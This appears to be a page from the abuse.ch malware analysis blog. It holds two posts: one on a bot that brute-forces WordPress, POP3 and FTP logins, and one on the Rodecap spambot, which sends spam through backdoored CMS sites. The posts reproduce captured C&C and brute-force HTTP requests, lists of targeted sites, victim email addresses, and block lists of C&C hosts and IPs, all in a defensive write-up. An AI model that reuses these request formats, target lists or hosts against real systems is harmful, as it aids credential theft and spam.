Archive for the 'Malware & Virus Analysing' Category

Page 3 of 45

Malware With Bruteforce Capabilities

Today I came across an interesting piece of malware that attacks websites that are running WordPress by trying to guess the users credentials using brute-force methodology. Arbor already did an analysis of this threat in the beginning of September which they have published under the name Fort Disco. However, the brute-force attacks issued by Fort Disco is not limited to Content Management Systems (CMS).

*** The malware ***

The malware installs itself into the All Users directory to ensure that it gets started whenever a user logs on to the computer:

C:\Documents and Settings\All Users\Application Data\System\filename-of-the-infection-binary.exe

In addition, the malware will create the following registry key:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run\filename-of-the-infection-binary

Digging a little bit deeper, I found several other malware samples in my zoo that seem to belong to the same malware family:


MD5 hash Botnet C&C server
c09585e10a5faa7865fe18af370b5e14 hXXp://google-update.pw/cmd.php
bd03abc172becc1cafaf1367aeb67d10 hXXp://google-update.pw/cmd.php
284141c69272444566abe47947e65d1d hXXp://pizdaprovoda.com/cmd.php
8da5edce85cd55cf36f6d97a7b1f24e7 hXXp://borailibali.com/cmd.php
538a4cedad8791e27088666a4a6bf9c5 hXXp://cureid.pw/cmd.php
c2ec42e5dce6044bf3b07950ccb1b144 hXXp://dedart.ru/cmd.php (thanks to @raashidbhatt)
a25737d6a881fc327ba1b8bdb37cc391 hXXp://my.ololo.in/cmd.php

This particular malware appeared for the first time in my malware zoo on July 1st, 2013.

*** C&C botnet communication ***

The malware itself is using HTTP POST and HTTP GET to communicate with its C&C infrastructure. What is interesting is the fact that the main C&C URL is always using /cmd.php (see above). When talking to the C&C server, the infected computer (bot) first registers itself by sending a HTTP POST with content status=0 to the C&C server:

POST /cmd.php HTTP/1.0
Host: google-update.pw
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)
Content-Type: application/x-www-form-urlencoded
Content-Length: 8

status=0

Afterwards the bot will be able to retrieve commands from the botnet herder. If the botnet C&C responds with 5 zeros (0 0 0 0 0), there is no task for the bot. Otherwise the C&C server will respond with something like this:

1
30

http://google-update.pw/pass_bot_pull/1001632.txt

abertxuiop123
480

The C&C server tells the bot that it has a new task to execute and will provide a link to a text-file (pass_bot_pull/1001632.txt) and a password (abertxuiop123). If we take a look at the content of the text-file the bot retrieves from its C&C server, we will see what this is all about:

online-kino.kz/admin.php
onlyagame.wbur.org/wp-login.php
onstarshipsanddragonwings.com/wp-login.php
ontariothoroughbred.com/wp-login.php
onokart.wordpress.com/wp-login.php
opemainc.com/administrator/index.php
paddockartstudios.co.uk/wp-login.php
pacificstewardship.com/wp-login.php
pagosaspringscdc.org/wp-login.php
palmlakeestates.org/wp-login.php
panamacityera.com/wp-login.php
palestinehigh.com/wp-login.php
paotothelo.wordpress.com/wp-login.php
paradigmoz.wordpress.com/wp-login.php
parallellogram.com/wp-login.php
pardonjohnnycash.com/wp-login.php
parfumka.pro/wp-login.php
parentingaces.com/wp-login.php
patcrann.wordpress.com/wp-login.php
pastorjimmydean.com/wp-login.php
[...]

The text-file contains a huge list of exactly 5’000 websites that are running WordPress. These URLs points to PHP login scripts (usually wp-login.php) that handle the WordPress user authentication.

It’s not hard to guess what is coming next: The bot will go through the whole list of WordPress websites it retrieved from the C&C server and will try to login to WordPress using the user name Administrator and the password provided by the C&C server before:

POST /wp-login.php HTTP/1.0
Host: onlyagame.wbur.org
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:19.0) Gecko/20100101 Firefox/19.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Referer: onlyagame.wbur.org/wp-login.php

log=Administrator&pwd=abertxuiop123&redirect_to=onlyagame.wbur.org%2Fwp-admin%2F&testcookie=1

Wordpress Bruteforce

WordPress bruteforce attempts (click to enlarge)

*** Bruteforcing other internet services ***

Going down the rabbithole, I found a sample of this particular malware that was brute-forcing POP3 instead of WordPress credentials (MD5 538a4cedad8791e27088666a4a6bf9c5):

GET /login.txt HTTP/1.1
User-Agent: PrototypeB
Host: cureid.pw
Cache-Control: no-cache

Notice the User-Agent PrototypeB that we haven’t seen before. The C&C server response looks like this:

admin
info
support
admin@{domain}.{zone}
info@{domain}.{zone}
support@{domain}.{zone}

This appears to be a list of user names that the bot will use later to brute-force POP3 credentials. But first the bot will register itself at the C&C server in the same way we have seen before (HTTP POST /cmd.php with content status=0). Once the bot has registered itself, it will retrieve a new task from the C&C server:

1
50
temp_brut/915232.txt
580
921751322

The bot will fetch the file temp_brut/915232.txt. Looking at this file, the content looks very interesting:

koshcenter.com:mx-caprica.easydns.com
lapantomima.com:mail.lapantomima.com
literarymusings.com:smtp.secureserver.net
nashvillehype.com:nashvillehype.com
kunstplatz.com:mc01.mhs.ch
twangthing.com:smtp.secureserver.net
victorx.com:mx00.1and1.com
julianoakes.com:punt1.th.hotchilli.net
bddrumstudios.com:mx00.1and1.com
axesandalleys.com:mx00.1and1.com
vikingrail.com:smtp.secureserver.net
coverjunkies.com:mail2.bandzoogle.com
arabove.com:aspmx.l.google.com
[...]

The file contains a large list of domain names followed by the responsible MX record that handles email for the particular domain name (domain:pop3-server). The bot will now try to brute-force POP3 credentials for these domain names, using the MX-record and user name that the bot retrieved from the C&C server before:

POP3 Bruteforce

POP3 bruteforce attempts (click to enlarge)

While speaking with the guys over at Shadowserver, they reported that they have seen this malware family bruteforcing FTP credentials using the same methodology.

*** Detecting bruteforce attempts by this malware ***

These brute-force attempts against WordPress should be easy to detect. First of all, the bot sends a poor HTTP referer to wp-login.php. For the example above, your browser would send the HTTP referer http://onlyagame.wbur.org/wp-login.php while this bot will omit the protocol name (onlyagame.wbur.org/wp-login.php without leading http://). Second, the malware misses three HTTP headers which are usually being sent to the remote webserver with every HTTP request when using a standard web browser. These three header fields are Accept, Accept-Encoding, and Accept-Language.

Comparing a real HTTP header with a brute-force attempt by this malware will show the following:

Bot HTTP header

Host: fredericacade.wordpress.com
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:19.0) Gecko/20100101 Firefox/19.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 302
Referer: fredericacade.wordpress.com/wp-login.php

User HTTP header

Host: fredericacade.wordpress.com
Accept: text/html,application/xhtml+xml,application/xml
Accept-Language: da, en-gb;q=0.8, en;q=0.7
Accept-Encoding: gzip, deflate
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:19.0) Gecko/20100101 Firefox/19.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 302
Referer: http://fredericacade.wordpress.com/wp-login.php

*** Preventing bruteforce attacks against WordPress ***

Bruteforce attacks against WordPress and other Content-Management-Systems (CMS) aren’t something really new. In the past few months abuse.ch (which is also running on WordPress) has identified and blocked more than 21’000 bruteforce attempts against the blog. While such brute-force attacks usually have been carried out by malicious python- and perl scripts hosted on various rogue servers in the internet in the past, this seems to be one of the first malware family that is being used to bruteforce WordPress credentials.

In fact it isn’t too difficult to prevent these kind of bruteforce attacks against WordPress. There are a few simple things you can do to protect your WordPress blog from this threat:

  • First of all, you should implement a Two-Factor authentication mechanism on your WordPress site. To do so, you can use Google Authenticator on your smartphone (which is for example already being used by Dropbox) in combination with the Google Authenticator Plug-In for WordPress. It’s very easy to setup and not only provides protection against brute-force attacks but also prevents cybercriminals from being able to login to your WordPress blog using stolen credentials (that were obtained before by e.g. using a password stealer on your computer).
  • There is another nice WordPress Plug-In around called Limit Login Attempts. With this Plug-In you can limit the number of login attempts by IP address. By this you can make sure that every IP address will only have a specific number of retries (eg. 4) until it gets banned from login in to WordPress for a specific periode of time (eg. 24hrs).
  • You can limit access to wp-admin/ and wp-login.php by using .htaccess with an additional username/password. By doing this you can not just reduce brute-force attempts but also prevent attacks against the WordPress admin panel that are taking advantage of unpatched security vulnerabilities in WordPress.
  • Another possibility to prevent automated brute-force attacks is to rename the PHP file that is responsible for the WordPress authentication (wp-login.php) to something specific that only you know (eg. nigol-pw.php).
  • Since the HTTP POST request issued by this malware family is poorly crafted, you might want to use a Web Application Firewall (WAF, for example ModSecurity) to block suspicious and automated HTTP requests. By using a WAF, you can also block other known web based attacks against your site.
  • You should also change the default username that you are using to manage your site (do not use Administrator or Admin).
  • Keep your WordPress blog up to date, not only WordPress itself but also all 3rd party Plug-Ins. Always use the most recent version of WordPress and installed Plug-Ins.
  • Last but not least you may also want to have a look at the WordPress Hardening Guide.

*** Conclusion ***

With this malware, cybercriminals created a way to distribute brute-force attacks not only against WordPress but also against POP3-servers around the world, including Google and Outlook (formerly Hotmail) and FTP servers on the internet.

What the criminals will use the compromised WordPress accounts for once they have successfully gained access to them, is unclear at this time. However, last week I read a news article heise.de (sorry, it’s in german) that reports DDoS attacks that have been conducted by WordPress blogs. The German Anti-Botnetz-Beratungszentrum suspects (sorry, its in german as well) that the attacking WordPress websites have been hacked previously by using brute-force methodology. I’m not sure if this is related or not, but it could be a scenario of what WordPress websites that have been compromised by this malware can be used for. So this seems to be one of the first malware families with generic brute-force capabilities.

As a side note: Both the Snort/Suricata ruleset from Emerging Threats and Sourcefire VRT already have signatures to detect botnet C&C traffic from this malware.

Follow me on Twitter: https://twitter.com/abuse_ch

New Spambot In Town Using Compromised Websites To Send Spam

Today, while digging in my sandnet, I came across a trojan that I’ve never seen before and that appeared to be new to me. The trojan gained my attention because its HTTP POSTing to www.google.com which is a bit weird (but more on this later). So, I decided to have a closer look at the trojan and found 20 binaries in my sandnet that showed up a similar behaviour:

2013-07-21 a1ae35eadf7599d2f661a9ca7f0f2150
2013-07-23 a00fd847d7152d2439251d5e5bf20dca
2013-07-29 a11daf09c9ef63466637a0c97a44ae0e
2013-07-30 289e7c3dd1771a1e0865417f81e2308c
2013-07-30 2f1da170625f1f5e5e9aebf0627abd62
2013-07-30 39e5cad818c033dd4b417593a2c16474
2013-07-30 3acf24d2285ce24f54ea60d33005ac2e
2013-07-30 4dce9885245756c8b159c08ebb660040
2013-07-30 4f5794df9bb22321975bc028038d6194
2013-07-30 6daf4f7a6f7131373ff16e7604555cc3
2013-07-30 75d4f090f80ef2628f659cad707d4b7d
2013-07-30 922260a5adbf1698cf1ab0eb0d40036a
2013-07-30 94bda5fa7c52c24259cdf2b3f7c14ebf
2013-07-30 a4b05e98cf2778fd5f44d5c3f5ff0599
2013-07-31 ab11d73f0de74b48deb7023483b49979
2013-07-31 b36c12525968dd29f23523d8898c4c82
2013-07-31 e9db3ab0f75f339995aecd61ebeb8cb6
2013-07-31 f5b627d158d61034064e71cfdd3eaa41
2013-08-01 47f910f5caf4a886675bdb88a317b9c2
2013-08-01 a29fd30396c564fc40a86b54ec36d602

As shown above, I’ve seen the first malware binary showing this behaviour on 2013-07-21. The trojan seems to be, at least from my perspective, somewhat new. What also made me curious of about this trojan is the fact that only 3 out of these 20 binaries are known to Virustotal. However, they seem to have quite a good AV coverage:

MD5 hash: a1ae35eadf7599d2f661a9ca7f0f2150
AV coverage: 35 / 46

MD5 hash: a00fd847d7152d2439251d5e5bf20dca
AV coverage: 34 / 46

MD5 hash: a1ae35eadf7599d2f661a9ca7f0f2150
AV coverage: 35 / 46

Having a look at the AV-results, this trojan is being detected as Rodecap by most AV-vendors. Symantec discovered this new threat on July 23 2013, two days after my sandnet came across the first malware binary showing with this behaviour:
https://www.symantec.com/security_response/writeup.jsp?docid=2013-072315-2550-99

*** The Trojan ****
Once a computer has been infected, Rodecap installs itself into the following directories:

C:\Document and Settings\USERNAME\Local Settings\Application Data\Microsoft\
C:\Document and Settings\USERNAME\Local Settings\Application Data\

The trojan copies itself to these directories using one of the following filenames:

cmstp.exe
ieudinit.exe
logman.exe
lsm.exe
mstsc.exe
sessmgr.exe
spoolsv.exe
wininit.exe
winlogon.exe

In addition, Rodecap might also write the following files:

C:\Documents and Settings\All Users\ieudinit.exe
C:\Documents and Settings\All Users\dllhost.exe

To ensure that Rodecap gets loaded on the system start, it creates a registry key in HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ using one of the following names:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run\MessageService
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Connection Manager
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Spooler
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Sessmgr
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\WinLogon

The AV-vendor ESET has documented additional filenames and registry keys used by Rodecap.

*** Rodecap C&C Traffic ***
The botnet C&C communication used by Rodecap is quite fancy. As mentioned before in this blog post, Rodecap initially communicates with a C&C server using www.google.com. But it also does some other interesting C&C communication which is described below.

To obtain the address of the main C&C server, Rodecap gets the MX record of lyrics-db.org. This DNS response contains two MX records which are pointing to a different domain name:

DNS query: lyrics-db.org IN MX

DNS response:
13 mx1.games-olympic.org.
17 mx2.games-olympic.org.

Rodecap will now obtain the IP address of the main C&C server by getting the A record of one of the referenced MX records:

DNS Query: mx1.games-olympic.org IN A
DNS response: 95.163.104.68

Rodecap C&C Traffic

Rodecap C&C traffic (DNS)

This will tell Rodecap to use the IP address 95.163.104.68 as C&C server. Rodecap even goes one step further, and tries to evade sandboxes by using www.google.com in the HTTP Host header while talking to the C&C (of course this won’t work in a corporate environment where a web proxy server is in place):

POST /protocol.php?p=XXX&d=XXX HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: www.google.com
User-Agent: Mozilla/5.0
Content-Length: 72
Connection: Keep-Alive
Cache-Control: no-cache

d=XXX

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 31 Jul 2013 X
Content-Type: application/octet-stream
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=20

*encrypted data*

If you take a look at this HTTP Header this request should go to www.google.com, but in fact the bot sends the request to 95.163.104.68 which has been previously obtained by Rodecap using the MX DNS query. The IP address belongs to a Russian web hosting company called Digital Networks CJSC (DINET / msm.ru):

inetnum: 95.163.0.0 – 95.163.255.255
netname: RU-DINET-20081230
org: ORG-DNJ1-RIPE
descr: Digital Networks CJSC
admin-c: DNO-RIPE
tech-c: DNO-RIPE
country: RU
status: ALLOCATED PA
mnt-by: RIPE-NCC-HM-MNT
mnt-lower: DN-MNT
mnt-routes: DN-MNT
mnt-domains: DN-MNT
source: RIPE # Filtered

Of course, Google is not hosted in Russia…

Once the bot contacted the main C&C server, it will tell the bot to drop additional malware components (PE32 executables):

hXXp://www.google.com/d/conh11.jpg
hXXp://www.google.com/d/fu13.jpg

Again, these files are not hosted on Google, but on 95.163.104.68. The dropped files are not .jpg files rather than windows executables:

Rodecap Binary Drop

Rodcap dropping additional binaris

*** Rodecap spam module ***
What Rodecap drops here seems to be at least one module that is used for spamming. This spam module has an interesting way of spamming internet users mailboxes. To do so, Rodecap will call a C&C server at newsleter.org to get a task from the botnet herder using HTTP GET:

GET /d/t14.php HTTP/1.1
User-Agent: -
Host: t.newsleter.org
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 31 Jul 2013 X
Content-Type: text/plain
Content-Length: 309
Connection: keep-alive
Keep-Alive: timeout=5
Last-Modified: Mon, 22 Jul 2013 X
ETag: “X”
Accept-Ranges: bytes

*encrypted data*

I’ve seen the spam module using different subdomains of newsleter.org, and they are hosted on different IP addresses:

t.newsleter.org (95.163.104.93 – AS12695 DINET RU)
bt.newsleter.org (208.115.109.53 – AS23033 Wowrack US)
seek.newsleter.org (208.115.109.53 – AS23033 Wowrack US)
fw.newsleter.org (85.143.166.221 – AS56534 Prix RU)

What Rodecap will try to get from these C&Cs is a spam template and a list of hijacked websites (more on that below).

*** CMS php backdoor component ***
Unlike other spam botnets that are either using stolen SMTP credentials for spamming, spamming the victims mailserver directly or abusing open SMTP relays, Rodecap seems to use a huge list of websites that have been compromised and running some kind of PHP script (backdoor). Within a few hours I was able to retrieve more than 3’500 unique websites that seems to run an outdated content management system (CMS, such as Joomla!) and which have already been compromised and hosting a malicious PHP file. A list of compromised websites I’ve came across so far and that are associated with Rodecap can be found here:

https://www.abuse.ch/downloads/rodecap_compromised_cms.txt

Unfortunately I wasn’t able to get a copy of such a PHP file yet, but based on the botnet traffic towards these compromised websites it seems that Rodecap is spamming through these PHP files:

Rodecap Spammodule C&C Traffic

Roadcap C&C Traffic

The HTTP POST request look like this:

POST /old/nieuw/plugins/editors/tinymce/jscripts/tiny_mce/plugins/devkit/stats.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0
Host: www.hrmet.nl
Content-Length: 883
Connection: Keep-Alive
Cache-Control: no-cache

encrypted data

HTTP/1.1 200 OK
Date: Wed, 31 Jul 2013 X
Server: Apache
X-Powered-By: PHP/5.2.14
Content-Length: 39
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
Content-Type: text/html

OK+taskid+0

If the PHP backdoor response with “OK” and the task ID, the spam email was obviously sent successfully. I’ve also seen various compromised websites returning the OS version and the task id instead of just “OK”. For example:

Linux20+taskid+1 (for webservers running Linux)
WINNT20+taskid+1 (for webservers running Windows, mostly IIS)

If the PHP backdoor isn’t able to send the spam mail (eg. because the spam mail has been rejected by the remote mail server), the PHP backdoor will send this information back to the bot along with the error message from the remove mail server.

Some examples:

Linux20+taskid+4+(dave332453@aol.com)+550 5.1.1 : Recipient address rejected: aol.com|
Linux20+taskid+3+(davehibbeler@hotmail.com)+421 RP-001 (BAY0-MC2-F47) Unfortunately, some messages from 92.53.113.126 weren’t sent. Please try again. We have limits for how many messages can be sent per hour and per day. You can also refer to http://mail.live.com/mail/troubleshooting.aspx#errors.|
Linux20+taskid+2+(davecarter159@yahoo.com)+421 4.7.0 [GL01] Message from (217.21.184.244) temporarily deferred – 4.16.50. Please refer to http://postmaster.yahoo.com/errors/postmaster-21.html|

According to the error messages, Rodecap currently targets big free email providers such as Windows Live, Yahoo and AOL.

I ran a Rodecap binary in a sandbox for a few minutes and checked the responses from the compromised websites. Based on the responses it appears that most of the spam sent by Rodecap were accepted by the remote mail servers.

*** Conclusion ***
This new threat seems to be just another spam bot in the wild. However, it is using some interesting methods for C&C communication and for sending out spam that I’ve never seen before. In fact the idea is quite good: There are ten thousands of websites out there running vulnerable (unpatched) CMSes that can easily be exploited to install malicious software on the victims webspace. The Rodecap gang seizes this opportunity to install a PHP backdoor that then allows them to send emails through the compromised webservers. By doing this, the criminals avoid common blacklists, especially blacklists that are listing dynamic IP space used by end users (DSL / cable subscribers) such as Spamhaus PBL or SORBS DUL.

To defend your network against this new threat, you should:

  • Block HTTP User-Agent “Mozilla/5.0″ and “-” on your Web Proxy
  • Ensure that your CMS is up to date running the latest version

In addition, you might also want to block the C&C communication associated with Rodecap going to the following destinations:

lyrics-db.org
games-olympic.org
mx1.games-olympic.org
mx2.games-olympic.org
newsleter.org
t.newsleter.org
bt.newsleter.org
seek.newsleter.org
fw.newsleter.org
95.163.104.68
95.163.104.93
208.115.109.53
85.143.166.221

UPDATE 2013-08-02 11:15 UTC
A reader of abuse.ch contacted me and suggested to block 95.163.64.0/18
entirely which belongs to Digital Network JSC (DI-NET Russia). According to him this blockage didn’t cause any false positive in the last 2 years.

Follow me on Twitter: https://twitter.com/abuse_ch




economics-recluse
Scene
Urgent!